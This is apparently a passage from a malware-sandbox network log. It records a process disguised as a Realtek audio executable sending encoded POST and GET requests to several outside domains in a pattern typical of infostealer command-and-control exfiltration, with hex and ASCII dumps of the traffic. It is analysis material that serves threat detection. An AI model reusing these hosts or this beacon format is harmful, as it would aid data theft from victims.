                                                                                                  Dec 3, 2024 09:48:15.897422075 CET2523OUTData Raw: 55 75 71 42 78 79 38 71 4d 65 74 79 50 48 45 61 46 7a 2f 41 70 37 70 75 75 6b 37 38 45 5a 4b 79 59 42 75 64 75 4e 37 6e 75 50 6c 5a 4a 52 63 75 53 6c 53 72 57 70 39 37 69 6f 48 45 78 6a 74 4c 69 4a 2f 50 32 76 69 4a 37 74 6a 75 2f 52 6e 7a 44 72
                                                                                                  Data Ascii: UuqBxy8qMetyPHEaFz/Ap7puuk78EZKyYBuduN7nuPlZJRcuSlSrWp97ioHExjtLiJ/P2viJ7tju/RnzDrtIvIqVKjnzgPq8pdTklMbacfybCWMf58ijyosmQQ/xdUh1EqbDfhlzBDBGJIXcMk2nS06L/7YjVBpS66HnayM4SR4PKK+eDFxltwQCtsim31/W7vaFnmcHKHuy/YigmiLjzL8+lBYys2DTybSlw5OJtjSZbV/YjZx


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.11.304987213.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:18.533057928 CET414OUTGET /wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:48:18.644743919 CET405INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 03 Dec 2024 08:48:18 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 265
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 61 6f 6e 6c 35 78 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 59 37 72 79 6a 62 78 43 70 70 48 69 39 4f 6d 7a 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 33 45 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 49 65 49 71 61 6f 49 59 75 73 47 69 44 7a 49 63 70 48 50 4f 73 33 42 31 71 59 54 76 72 64 30 51 6a 30 73 3d 26 77 59 48 6b 3d 4d 5f 42 2d 67 68 63 32 48 71 6f 57 68 6d 65 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.11.304987366.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:23.942636013 CET678OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 4f 76 2f 33 68 6c 48 45 7a 63 58 56 6e 5a 4a 77 47 36 32 53 71 56 33 7a 51 51 39 75 56 53 6f 41 31 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStOv/3hlHEzcXVnZJwG62SqV3zQQ9uVSoA1Q==
                                                                                                  Dec 3, 2024 09:48:24.130732059 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:48:24 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.11.304987466.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:26.635591030 CET698OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 4c 65 4d 52 51 47 58 51 70 62 6f 57 44 35 74 53 6d 59 63 4b 41 57 6c 6f 55 4c 42 32 57 33 53 2b 63 3d
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51LeMRQGXQpboWD5tSmYcKAWloULB2W3S+c=
                                                                                                  Dec 3, 2024 09:48:26.816209078 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:48:26 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.11.304987566.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:29.341114998 CET1289OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 6a 67 54 72 64 31 55 55 6a 38 5a 71 58 48 5a 39 65 34 72 58 67 58 59 42 64 44 5a 78 48 44 44 71 63 57 67 72 66 42 6e 65 36 71 70 6a 48 62 58 45 6c 45 45 59 43 78 51 77 57 2f 39 72 54 48 68 4b 62 67 68 75 65 4e 66 66 6a 4f 51 45 5a 4d 73 4a 58 50 64 34 46 44 77 32 78 77 64 43 43 43 45 4c 32 31 7a 70 39 67 52 4b 79 6e 56 63 63 58 34 36 51 39 65 6d 5a 4a 49 31 65 4b 64 73 33 74 75 2f 75 57 57 78 66 6e 72 36 64 6e 5a 76 33 6a 5a 61 41 73 50 66 6d 67 33 76 4a 41 47 44 51 73 64 54 78 75 56 59 5a 6d 39 48 63 49 31 6c 45 50 62 6d 52 71 58 72 36 57 34 69 78 53 63 37 69 56 50 67 67 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubjgTrd1UUj8ZqXHZ9e4rXgXYBdDZxHDDqcWgrfBne6qpjHbXElEEYCxQwW/9rTHhKbghueNffjOQEZMsJXPd4FDw2xwdCCCEL21zp9gRKynVccX46Q9emZJI1eKds3tu/uWWxfnr6dnZv3jZaAsPfmg3vJAGDQsdTxuVYZm9HcI1lEPbmRqXr6W4ixSc7iVPgg3R0rfMFlrruUO37vlY8YsbLl1IE0HnqToyHOr0lUZiXdR0J9hxs4o1lbmhYa7nw5DOTMh7dg8Hz0x+U6XFMr93nHIkolEZYn5PmOHMgh2LaMC0Xlubf9wATz4gMBf5HXPVqtfl3I8077UzzPqsB4dkLzE7IB4B1sSJOHCJ2IWR+bz6soSi+sngo/QJmTEDCq0NjMlTnxH9eCAnv0b2ildGTEOtewXkGJHotIsLhzV54hsAzjCqKpNuqL1urBiHgG0SiB/1Xr+vRgkkvKNR/NV8aSZZFIM/vpqk9FKuaaWlTPRKrESec+XvJEhjWvCNOLVHrOTzgEyi6RIVvxALCD8h46G3OXqwtlotvFxleeM2q0JVaAsPykSV3vnP6euPDFK6z7VqKoZTqSuZXm+thpV76NPAdUSVDszkKRPanbqpjA9Ha/JmjM80RPF/dhInh9Pqa6KlgRqcfPvMIk2UDHiQsUccS/
                                                                                                  Dec 3, 2024 09:48:29.341185093 CET2526OUTData Raw: 71 51 2b 30 78 57 38 42 37 5a 72 56 38 67 37 6e 31 75 4a 2b 77 30 30 49 64 70 55 62 76 6f 76 34 4d 2b 6d 68 35 70 37 39 79 73 7a 6c 78 49 74 2b 56 6c 53 49 4e 7a 68 38 2b 4f 6f 56 5a 4f 38 35 63 36 35 71 52 61 58 71 50 72 2f 5a 59 4a 70 72 70 56
                                                                                                  Data Ascii: qQ+0xW8B7ZrV8g7n1uJ+w00IdpUbvov4M+mh5p79yszlxIt+VlSINzh8+OoVZO85c65qRaXqPr/ZYJprpV3dm/tbcTQzlyV5z7NLT2L1oXdQSkv6wt/NAnrQA263jkmVPNyzrQHkUWeA8Ui1Dl5SbxqTQgpm+hcRXb8DAeUC2/4WKFRGSz1plrwaJ6xZzDPSt1bKS4n8a594Xx6jdIuvYqJIsDvCd9aU+Xi27WmagQtqq791l/H
                                                                                                  Dec 3, 2024 09:48:29.527301073 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:48:29 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.11.304987666.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:32.038939953 CET415OUTGET /r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:48:32.218189001 CET652INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:48:32 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.11.30498773.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:37.463009119 CET672OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 30 6f 47 70 4c 71 45 4c 39 39 72 46 57 5a 67 6e 76 72 4e 44 51 77 79 72 56 30 69 4c 57 32 4a 79 57 53 63 45 56 71 41 73 77 6d 6c 2f 69 71 53 68 4d 49 79 69 57 73 34 35 63 56 74 45 59 55 73 67 43 49 31 77 52 6d 7a 6c 32 37 55 66 42 47 36 53 66 4e 64 37 51 4b 68 38 4c 67 46 33 6f 71 34 5a 79 54 37 52 44 49 64 6b 7a 65 6c 67 64 58 6d 77 6a 38 6d 4d 57 2b 79 48 47 50 56 68 2b 4f 38 37 44 54 75 67 30 6d 71 72 6f 6c 6e 51 48 74 2f 73 31 77 6e 4b 41 41 62 48 76 51 34 6e 31 58 63 59 35 33 4b 73 56 6d 4e 4e 52 71 4b 4d 76 30 6c 4c 4c 36 46 5a 53 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKAAbHvQ4n1XcY53KsVmNNRqKMv0lLL6FZSQ==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.11.30498783.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:40.106524944 CET692OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 46 39 79 59 54 73 45 55 72 41 73 33 6d 6c 2f 74 36 53 6f 43 6f 79 39 57 73 45 4c 63 58 35 45 59 55 34 67 43 4a 46 77 52 33 7a 71 31 4c 56 35 4d 6d 36 55 42 39 64 37 51 4b 68 38 4c 67 52 5a 6f 71 41 5a 79 6a 4c 52 42 70 64 6e 2b 2b 6c 6a 4c 48 6d 77 6e 38 6d 49 57 2b 79 78 47 4e 68 59 2b 49 34 37 44 53 65 67 30 33 71 73 6d 6c 6d 56 61 39 2b 47 78 79 58 43 4d 55 76 4c 69 52 51 5a 37 55 35 73 38 67 6e 32 49 6c 35 50 43 4b 32 68 7a 31 49 6a 4a 34 45 43 50 65 4d 74 43 47 38 48 4b 6e 55 33 6b 51 4d 5a 74 49 6c 45 5a 46 77 3d
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCK2hz1IjJ4ECPeMtCG8HKnU3kQMZtIlEZFw=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.11.30498793.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:42.749752045 CET1289OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
